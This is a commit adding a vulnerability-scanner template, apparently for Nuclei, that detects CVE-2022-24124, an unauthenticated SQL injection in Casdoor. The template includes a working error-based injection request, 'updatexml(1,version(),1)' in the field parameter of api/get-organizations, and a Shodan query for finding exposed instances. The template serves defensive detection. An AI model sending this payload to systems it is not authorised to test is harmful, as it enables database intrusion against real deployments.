Merge pull request #3799 from cckuailong/test2

add CVE-2022-24124
2022-03-03 16:16:57 +05:30 · 2022-03-03 16:16:57 +05:30 · 2e71889e88
parent 740fe2a6f9 fa10201d68
commit 2e71889e88
1 changed files with 38 additions and 0 deletions
--- a/cves/2022/CVE-2022-24124.yaml
+++ b/cves/2022/CVE-2022-24124.yaml
@ -0,0 +1,38 @@
+id: CVE-2022-24124
+
+info:
+  name: Casdoor 1.13.0 - SQL Injection (Unauthenticated)
+  author: cckuailong
+  severity: high
+  description: The query API in Casdoor before 1.13.1 has a SQL injection vulnerability related to the field and value parameters, as demonstrated by api/get-organizations.
+  reference:
+    - https://www.exploit-db.com/exploits/50792
+    - https://github.com/cckuailong/reapoc/tree/main/2022/CVE-2022-24124/vultarget
+    - https://nvd.nist.gov/vuln/detail/CVE-2022-24124
+  metadata:
+    product: https://casdoor.org/
+    shodan-query: http.title:"Casdoor"
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.5
+    cve-id: CVE-2022-24124
+    cwe-id: CWE-89
+  tags: cve,cve2022,casdoor,sqli,unauth
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/api/get-organizations?p=123&pageSize=123&value=cfx&sortField=&sortOrder=&field=updatexml(1,version(),1)"
+
+    matchers-condition: and
+    matchers:
+      - type: regex
+        part: body
+        regex:
+          - "XPATH syntax error.*&#39"
+          - "casdoor"
+        condition: and
+
+      - type: status
+        status:
+          - 200